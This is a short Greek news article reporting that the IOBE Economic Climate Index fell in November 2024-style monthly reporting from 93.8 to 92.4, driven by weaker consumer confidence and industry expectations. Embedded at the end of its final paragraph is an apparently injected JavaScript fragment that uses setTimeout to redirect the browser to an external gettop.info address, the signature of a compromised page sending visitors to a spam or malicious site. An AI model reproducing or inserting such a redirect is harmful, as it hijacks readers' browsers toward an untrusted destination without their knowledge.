ΙΟΒΕ: Επιδείνωση οικονομικού κλίματος στην Ελλάδα τον Νοέμβριο

0
7

 

Σύμφωνα με έρευνα οικονομικής συγκυρίας του ΙΟΒΕ, τον Νοέμβριο κινείται πτωτικά ο Δείκτης Οικονομικού Κλίματος στην Ελλάδα έπειτα από τρεις μήνες ανόδου, καθώς διαμορφώνεται στις 92,4 μονάδες (από 93,8 μονάδες τον Οκτώβριο), σε επίδοση πάντως υψηλότερη έναντι της αντίστοιχης περυσινής (87,1 μονάδες).

Η αλλαγή τάσης στο οικονομικό κλίμα προκύπτει ως αποτέλεσμα κυρίως της υποχώρησης της καταναλωτικής εμπιστοσύνης και δευτερευόντως της επιδείνωσης των προσδοκιών στη Βιομηχανία, σύμφωνα με τον ΙΟΒΕ.

Αντίθετα, στις Υπηρεσίες, στο Λιανικό εμπόριο και στις Κατασκευές σημειώνεται βελτίωση των σχετικών εκτιμήσεων και προβλέψεων. Η διόρθωση αυτή είναι μάλλον αναμενόμενη, καθώς η σταθεροποίηση της οικονομίας, επιτρέπει ηπιότερες αξιολογήσεις από πολίτες και επιχειρηματίες, ενώ παραμένει η αβεβαιότητα για τη μεσοπρόθεσμη πορεία της οικονομίας.

Ωστόσο,παραμενουν απαισιόδοξες οι προβλέψεις των νοικοκυριών για την οικονομική τους κατάσταση και για την οικονομική κατάσταση της χώρας το επόμενο 12μηνο ενώ επίσης υπενθυμίζεται ότι η βελτίωση του δείκτη κλίματος των προηγούμενων μηνών, αποτυπώθηκε στη συνέχεια και στον υψηλό ρυθμό ανάπτυξης του τρίτου τριμήνου όπως καταγράφηκε στα επίσημα στοιχεία της ΕΛΣΤΑΤ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here